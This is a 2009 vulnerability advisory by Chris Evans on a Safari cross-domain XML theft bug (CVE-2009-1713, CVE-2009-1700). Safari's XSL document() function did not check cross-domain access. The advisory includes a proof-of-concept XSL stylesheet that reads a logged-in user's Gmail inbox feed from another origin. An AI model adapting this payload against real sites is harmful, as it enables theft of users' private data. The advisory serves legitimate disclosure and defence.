CESA-2009-008 - rev 1


[See all my vulnerabilities at http://scary.beasts.org/security]

[Blog if you want to subscribe to new findings is at http://scarybeastsecurity.blogspot.com/]

Apple Safari cross-domain XML theft



Programs affected: Safari prior to version 4. In addition, the "302 redirect trick" variant affected a pre-production version of Chrome.
Severity: Websites can steal any XML formatted data cross-domain
Vendor URL (copy): APPLE-SA-2009-06-08-1
CVE: CVE-2009-1713, CVE-2009-1700
Initial report: Jun 2008

This bug represents a failure to check for cross-domain access in a relatively obscure feature that permits cross-domain access. It is one of the bugs I demoed but did not disclose at PacSec and HiTB Dubai.

The particular feature involved in this case is the XSL document() function, which can load XML from a URL. Failure to check for cross-domain access here leads to XML theft from arbitrary web sites. XML theft is unpleasant because very sensitive information can be rendered in feeds, XML-formatted AJAX-y responses and XHTML versions of web apps.

Here's sample code for an evil XSL which abuses this function to steal inbox details from a logged-in Gmail session:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:str="http://exslt.org/strings" extension-element-prefixes="str">
<xsl:template match="*">
<html>
<body>
Below, you should see e-mail stolen cross-domain!
<p/>
<xsl:value-of select="document('https://mail.google.com/mail/feed/atom')"/>
<script>
alert(document.body.innerHTML)
</script>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

A variant of this attack, involving using the 302 redirect trick to fool the original fix's idea of the XML's domain also affected a pre-production version of Chrome (long since fixed and fixed prior to v1.0).

Demo

Click here whilst logged into Gmail using Safari 3

Credits


CESA-2009-008 - rev 1
Chris Evans
scarybeasts@gmail.com